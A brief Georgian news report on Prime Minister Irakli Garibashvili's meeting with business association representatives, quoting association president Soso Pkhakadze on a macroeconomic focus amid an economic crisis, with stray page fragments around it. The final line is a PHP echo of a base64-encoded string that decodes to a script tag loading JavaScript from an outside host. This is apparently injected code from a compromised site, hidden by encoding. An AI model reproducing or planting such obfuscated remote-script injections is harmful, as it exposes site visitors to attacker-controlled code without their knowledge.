celsiusi
ავერსი საქკაბელი
მთავრობის ადმინისტრაციაში საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილსა და ბიზნესასოციაციის წარმომადგენლებს შორის შეხვედრა იმართება.
 
როგორც შეხვედრამდე საქართველოს ბიზნეს ასოციაციის პრეზიდენტმა სოსო ფხაკაძემ განაცხადა, დღეს ძირითადად მაკროეკონომიკურ საკითხებს განიხილავენ, შემდეგ კი ფორმატი გაფართოვდება და პროცესში ეკონომიკის სხვა სექტორის წარმომადგენლებიც ჩაერთვებიან.
 
„ეს არის პირველი შეხვედრა ახალ პრემიერთან. ჩვენი მხრიდან ვიქნებით ძირითადად მაკროეკონომისტები და ფოკუსირებული ვიქნებით მაკროეკონომიკურ საკითხებზე. შემდეგ გაფართოვდება ფორმატი. ჩვენი ასოციაცია ქვეყანაში ეკონომიკის ყველა სექტორს წარმოადგენს. ამასთან, ამ პროცესში სხვა კომპანიებიც ჩაერთვებიან.
 
ჩვენ ყველამ ვიცით, რომ სახეზეა მწვავე ეკონომიკური კრიზისი, ამიტომ ბევრი გამოწვევაა. გვინდა, რომ ამ პრობლემებს ერთობლივად მივხედოთ. ყოველთვის ძალიან პროფესიულად, აკადემიურად და ობიექტურად ვაყენებთ საკითხებს და დღევანდელი დღეც ასეთი იქნება. შევეცდებით ყველა მწვავე პრობლემატური საკითხის გაშუქებას. დღეს იქნება მხოლოდ მაკროეკონომიკურ საკითხებზე ფოკუსირება, შემდეგ კი ჩაიშლება თემატიკის მიხედვით”,- განაცხადა ფხაკაძემ.
1287
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");